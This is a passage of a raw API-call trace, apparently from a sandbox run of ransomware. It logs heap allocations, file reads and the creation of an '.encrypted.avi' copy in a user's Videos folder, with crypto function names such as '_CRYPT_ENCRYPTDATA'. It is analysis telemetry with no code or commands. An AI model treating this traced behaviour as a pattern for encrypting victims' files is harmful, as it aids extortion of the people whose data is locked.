(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.814] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\23efg7fei5t7rrlh_.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0042.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0042.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.816] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.816] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.819] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x898, lpOverlapped=0x0) returned 1 [0042.819] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10898) returned 0xac2018 [0042.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10898) returned 0xad28b8 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10898) returned 0xac2018 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.822] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10898) returned 0xac2018 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10898) returned 0x935008 [0042.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0042.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.825] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.826] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.827] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.827] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 